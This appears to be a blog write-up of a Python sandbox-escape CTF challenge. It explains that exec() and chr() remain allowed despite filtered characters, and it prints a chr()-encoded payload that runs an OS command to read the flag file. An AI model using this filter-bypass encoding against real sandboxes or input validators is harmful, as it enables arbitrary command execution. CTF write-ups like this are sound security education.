Tzion

CTF / Reverse Engineering / Malware Analysis / Threat Intelligence / Threat Hunting

less than 1 minute read

This is a python sandbox challenge.

By inputting some characters, we can identify few Illegal characters:

[]._'"

But luckily () is allowed, looking at locals(), we can see exec() is allowed.

IMG

exec() required string argument but unfortunately '" were restricted. However, we found out that chr() is allowed, so let’s create our payload:

Original payload:

exec("__import__('os').system('cat flag')")

Payload crafted to bypass restrictions:

exec(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41))

Execute it and got the flag!

IMG

Flag:

flag{vuln3r4b1l17y_45_4_53rv1c3}

You may also enjoy

[MALWARE] Lumma Stealer Loader Analysis

2 minute read

On September 19, 2024, I received an email regarding a GitHub Scanner result for my public repository. Initially, the email was not flagged as malicious or s...

[HITCONCTF-QUALS] Antivirus

14 minute read

I played HITCON Quals CTF 2024 with merger team World Wide Union. This challenge provided a run.sh and print_flag.cbc file.

[MATRIXCUP] My Journey & Experience

4 minute read

I am thrilled to participate in MatrixCup 2024 in QingDao, China with my team, 打个没五分钟充电三小时, humorously named after M53. Before we begin, I would like to tha...

[HACKTHEON] My Journey & Experience

2 minute read

Hackathon 2024 Adventure I am honored to participate in Hacktheon 2024 held in Sejong, South Korea with team Kopi Cincau consisting of M53 members Kelzin (@m...